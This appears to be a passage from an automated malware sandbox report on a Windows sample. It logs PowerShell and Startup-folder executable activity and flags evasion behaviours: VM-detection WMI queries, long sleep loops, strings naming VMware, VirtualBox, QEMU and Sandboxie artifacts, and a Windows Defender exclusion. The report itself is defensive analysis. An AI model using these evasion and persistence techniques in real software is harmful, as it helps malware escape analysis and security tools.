                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      barindex
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\AppData\Roaming\srt.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\AppData\Roaming\srt.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
                      Tries to delay execution (extensive OutputDebugStringW loop)Show sources
                      Source: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exeSection loaded: OutputDebugStringW count: 112
                      Source: C:\Users\user\AppData\Roaming\srt.exeSection loaded: OutputDebugStringW count: 112
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeSection loaded: OutputDebugStringW count: 218
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                      Source: srt.exe, 00000003.00000002.2184800026.0000000004073000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL/WINE_GET_UNIX_FILE_NAMEQEMU
                      Source: srt.exe, 00000003.00000002.2184800026.0000000004073000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLLUSER
                      Source: C:\Users\user\AppData\Roaming\srt.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\srt.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\srt.exeWindow / User API: threadDelayed 1495
                      Source: C:\Users\user\AppData\Roaming\srt.exeWindow / User API: threadDelayed 8244
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeWindow / User API: threadDelayed 1425
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeWindow / User API: threadDelayed 8337
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1288Thread sleep time: -120000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exe TID: 2624Thread sleep count: 100 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exe TID: 2568Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1616Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2812Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2152Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2932Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe TID: 3056Thread sleep count: 90 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe TID: 2172Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1204Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1844Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 884Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe TID: 1068Thread sleep count: 90 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2336Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2468Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\srt.exe TID: 2248Thread sleep time: -540000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\srt.exe TID: 1664Thread sleep time: -9223372036854770s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\srt.exe TID: 1664Thread sleep time: -120000s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2480Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2616Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe TID: 2904Thread sleep count: 87 > 30
                      Source: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe TID: 1956Thread sleep time: -60000s >= -30000s
                      Source: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe TID: 2692Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2980Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe TID: 1532Thread sleep time: -420000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe TID: 1468Thread sleep time: -21213755684765971s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe TID: 1468Thread sleep time: -60000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe TID: 1428Thread sleep count: 1425 > 30
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe TID: 1428Thread sleep count: 8337 > 30
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe TID: 1468Thread sleep count: 59 > 30
                      Source: C:\Users\user\AppData\Roaming\srt.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0289096A GetSystemInfo,4_2_0289096A
                      Source: C:\Users\user\AppData\Roaming\srt.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\srt.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\srt.exeThread delayed: delay time: 30000
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeThread delayed: delay time: 30000
                      Source: C:\Users\user\AppData\Roaming\srt.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeFile opened: C:\Users\user\AppData\Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeFile opened: C:\Users\user\Jump to behavior
                      Source: srt.exe, 00000003.00000002.2184800026.0000000004073000.00000004.00000001.sdmpBinary or memory string: !noValueButYesKeySC:\WINDOWS\system32\drivers\VBoxMouse.sys
                      Source: srt.exe, 00000003.00000002.2184800026.0000000004073000.00000004.00000001.sdmpBinary or memory string: VMWAREESOFTWARE\VMware, Inc.\VMware Tools
                      Source: srt.exe, 00000003.00000002.2184800026.0000000004073000.00000004.00000001.sdmpBinary or memory string: vmware
                      Source: powershell.exe, 00000004.00000003.2093977554.00000000005F0000.00000004.00000001.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                      Source: srt.exe, 00000003.00000002.2184800026.0000000004073000.00000004.00000001.sdmpBinary or memory string: kernel32.dll/wine_get_unix_file_nameQEMU
                      Source: srt.exe, 00000003.00000002.2222748039.00000000065D0000.00000004.00000001.sdmpBinary or memory string: Vmciseq.dll
                      Source: srt.exe, 00000003.00000002.2184800026.0000000004073000.00000004.00000001.sdmpBinary or memory string: VMwareVBox
                      Source: srt.exe, 00000003.00000002.2184800026.0000000004073000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
                      Source: srt.exe, 00000003.00000002.2184800026.0000000004073000.00000004.00000001.sdmpBinary or memory string: InstallPathKC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\OC:\WINDOWS\system32\drivers\vmmouse.sysMC:\WINDOWS\system32\drivers\vmhgfs.sys
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\srt.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      Adds a directory exclusion to Windows DefenderShow sources
